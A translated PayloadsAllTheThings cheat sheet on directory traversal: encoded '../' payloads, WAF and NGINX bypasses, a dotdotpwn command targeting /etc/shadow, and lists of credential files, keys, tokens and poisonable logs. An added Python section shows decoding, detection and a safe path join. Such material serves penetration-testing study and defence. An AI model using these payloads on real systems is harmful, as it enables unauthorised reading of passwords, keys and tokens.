[Translation] PayloadsAllTheThings: Directory Traversal
Directory Traversal
This article is translated from swisskyrepo/PayloadsAllTheThings.
Exploitation methods not mentioned in the original have been added.
In the project on GitHub, the same directory also contains Intruder wordlists for directory traversal.
2022-12-14: first version of the translation
Directory and path traversal occurs when a user-supplied file name is not securely validated or sanitized, so that characters meaning "traverse to the parent directory" are passed through to the file API.
Tools
dotdotpwn - https://github.com/wireghoul/dotdotpwn
git clone https://github.com/wireghoul/dotdotpwn
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
Basic exploitation
We can use .. to reach the parent directory. The strings below are several encodings of that sequence that can help you bypass poorly implemented filters.
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
16-bit Unicode encoding
. = %u002e
/ = %u2215
\ = %u2216
UTF-8 Unicode encoding
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
Bypass "../" replaced by ""
Sometimes you encounter a WAF that strips the string "../" from the input; simply repeating the sequence gets around it.
..././
...\.\
Bypass "../" with ";"
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
Double URL encoding
. = %252e
/ = %252f
\ = %255c
For example:
Spring MVC directory traversal vulnerability (CVE-2018-1271)
http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
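Every encoding listed above (single and double URL encoding, overlong UTF-8, UTF-16 escapes, the ";" trick and the "..././" trick) collapses to the same few bytes once it is fully decoded, and that is the form a filter or a file API must be judged on. The following Python is an added example, not code from PayloadsAllTheThings or from the translator: it decodes a path the way a reviewer would before checking it, shows why a one-pass "../" strip fails, and contrasts a detection heuristic with the actual fix of resolving the real path and confining it to the document root. The lookup table, the document root /srv/app/public and all sample inputs are constructed for the example; nothing on disk is read.

```python
import os
import re
from urllib.parse import unquote

# Non-standard encodings from the cheat sheet mapped to the ASCII byte each one
# is meant to smuggle past a filter (constructed lookup table for this example).
OVERLONG = {
    "%c0%ae": ".", "%e0%40%ae": ".", "%c0ae": ".", "%c0%2e": ".",
    "%c0%af": "/", "%e0%80%af": "/", "%c0%2f": "/",
    "%c0%5c": "\\", "%c0%80%5c": "\\",
    "%u002e": ".", "%uff0e": ".", "%u2215": "/", "%u2216": "\\",
}
_OVERLONG_RE = re.compile(
    "|".join(re.escape(k) for k in sorted(OVERLONG, key=len, reverse=True)),
    re.IGNORECASE,
)


def canonical_decode(value: str, max_rounds: int = 3) -> str:
    """Decode until the string stops changing.

    Each extra round removes one more layer of URL encoding, so "%252e" becomes
    "%2e" and then ".". Overlong and UTF-16 forms are mapped first, because a
    standard decoder would turn them into replacement characters, not "../".
    """
    current = value
    for _ in range(max_rounds):
        step = _OVERLONG_RE.sub(lambda m: OVERLONG[m.group(0).lower()], current)
        step = unquote(step)
        if step == current:
            break
        current = step
    return current


def naive_strip(value: str) -> str:
    """The weak filter: delete "../" and "..\\" once, non-recursively."""
    return value.replace("../", "").replace("..\\", "")


def is_traversal(value: str) -> bool:
    """Detection heuristic for a WAF rule or log review: any ".." segment after
    full decoding. ";" is cut off because servlet containers treat it as the
    start of path parameters, which is why "..;/" works against Java apps."""
    decoded = canonical_decode(value)
    segments = re.split(r"[\\/]", decoded)
    return any(seg.split(";")[0] == ".." for seg in segments)


def safe_join(base_dir: str, user_path: str):
    """The actual fix: decode, join onto the base directory, resolve, and refuse
    anything whose real path is not inside the base. Returns None on rejection."""
    base = os.path.realpath(base_dir)
    decoded = canonical_decode(user_path).replace("\\", "/").lstrip("/")
    target = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    # Constructed probes built from the encodings listed on this page.
    for probe in ["../", "%252e%252e%252f", "%c0%ae%c0%ae%c0%af", "..;/..;/x", "img/a.png"]:
        print(f"{probe!r:24} -> {canonical_decode(probe)!r:12} traversal={is_traversal(probe)}")
    # A one-pass strip turns "..././" back into "../", so check after filtering.
    print("naive_strip('..././') =", repr(naive_strip("..././")))
    # Hypothetical document root; realpath confines the result without touching disk.
    print(safe_join("/srv/app/public", "../../../etc/passwd"))
    print(safe_join("/srv/app/public", "images/logo.png"))
```

The important design point is that is_traversal is only a signal (useful for alerting on the encodings this page lists), while safe_join does not try to recognise bad input at all: it computes where the request would actually land and rejects anything outside the base directory, which is why it also stops inputs the table does not know about.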
UNC (Universal Naming Convention) bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system, potentially redirecting access to an unintended location or an arbitrary file.
\\localhost\c$\windows\win.ini
NGINX/ALB bypass
NGINX in specific configurations, and ALB, can block traversal in the route; for example, http://nginx-server/../../
will return a 400 Bad Request.
To bypass this behaviour, simply prepend a slash to the URL:
http://nginx-server//../../
Java bypass
Bypass using Java's URL protocol
url:file:///etc/passwd
url:http://127.0.0.1:8080
Path Traversal
Interesting Linux files
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/etc/apache2/*
/etc/nginx/*
/etc/nginx/conf.d/default.conf
/etc/apparmor(.d)/*
/etc/(cron.d/*|crontab)
/etc/environment
/etc/hostname
/etc/php/*
/etc/mysql/*
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/[pid]/maps
/proc/[pid]/net/*
/proc/[pid]/(mounts|mountinfo)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
/var/www/html
/var/lib/php(5)/sessions/
/usr/local/nginx/conf/*
/usr/local/nginx/conf/nginx.conf
[user_dir_you_know]/.bash_history
[user_dir_you_know]/.bashrc
[user_dir_you_know]/.ssh/id_rsa(.pub)
[user_dir_you_know]/.viminfo
Interesting Windows files
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
The following are taken from https://github.com/soffensive/windowsblindread
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/system volume information/wpsettings.dat
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
Interesting log files
The following log files are controllable and can be included with a malicious payload to achieve command execution.
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
Labs
File path traversal, simple case
File path traversal, traversal sequences blocked with absolute path bypass
File path traversal, traversal sequences stripped non-recursively
File path traversal, traversal sequences stripped with superfluous URL-decode
File path traversal, validation of start of path
File path traversal, validation of file extension with null byte bypass
References
Path Traversal Cheat Sheet: Windows
Directory traversal attack - Wikipedia
CWE-40: Path Traversal: '\\UNC\share\name' (Windows UNC Share) - CWE Mitre - December 27, 2018
NGINX may be protecting your applications from traversal attacks without you even knowing
Directory traversal - Portswigger